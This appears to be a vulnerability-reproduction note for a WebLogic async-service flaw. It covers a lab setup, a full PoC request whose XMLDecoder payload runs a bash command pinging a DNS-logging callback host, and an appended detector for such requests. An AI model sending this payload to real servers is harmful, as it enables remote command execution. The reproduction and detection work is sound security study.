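References:
Reproducing the latest WebLogic vulnerability
Analysis of WebLogic CVE-2019-2647 and related XXE vulnerabilities
Environment setup:
On version 12.2.1.3, accessing the URL returned a 404,
so use the earlier vulhub Docker image, version 10.3.6.0:
The environment can also be set up on macOS, but this requires Java 6, which has to be downloaded here: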
https://support.apple.com/kb/dl1572?locale=zh_CN
https://updates.cdn-apple.com/2018/macos/031-33898-20171026-7a797e9e-b8de-11e7-b1fe-c14fbda7e146/javaforosx.dmg
After downloading and installing it, a 1.6.0.jdk directory is created under /Library/Java/JavaVirtualMachines.
PoC:
POST /_async/AsyncResponseService HTTP/1.1
Host: cqq.com:7001
Content-Length: 946
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>/bin/ping weblogic.fd49566cf2867bbbe5c4.d.zhack.ca</string>
</void>
</array>
<void method="start"/>
</void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
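
A detection-side check for requests shaped like the PoC above, as an added example that is not part of the original post: it flags SOAP bodies whose WorkContext header carries XMLDecoder-style class or method attributes. The function name inspect_request, the attribute heuristic and the sample bodies are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
ASYNC_PREFIX = "/_async/"
# Attributes java.beans.XMLDecoder uses to instantiate classes and call methods.
# Heuristic (assumption): these are treated as suspicious inside a WorkContext header.
INVOKE_ATTRS = ("class", "method")

# Constructed sample bodies (benign class names, not captured traffic).
SAMPLE = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.StringBuilder"><void method="append"><string>x</string></void></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
CLEAN = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
         "<soapenv:Body/></soapenv:Envelope>")


def inspect_request(path, body):
    """Return a list of findings for one request; an empty list means no match."""
    # Refuse DTDs outright so the inspector itself is not exposed to entity tricks.
    if "<!DOCTYPE" in body.upper():
        return ["DOCTYPE present: refused to parse"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    for ctx in root.iter(f"{{{WORKAREA_NS}}}WorkContext"):
        for el in ctx.iter():
            if el is ctx:
                continue
            tag = el.tag.rsplit("}", 1)[-1]  # drop any namespace prefix
            for attr in INVOKE_ATTRS:
                if attr in el.attrib:
                    findings.append(f"<{tag} {attr}={el.attrib[attr]!r}>")
    # Raise the priority when the hit arrives on the async service path.
    if findings and path.startswith(ASYNC_PREFIX):
        findings.insert(0, f"async endpoint {path}")
    return findings


if __name__ == "__main__":
    for name, body in (("sample", SAMPLE), ("clean", CLEAN)):
        print(name, inspect_request("/_async/AsyncResponseService", body))
```
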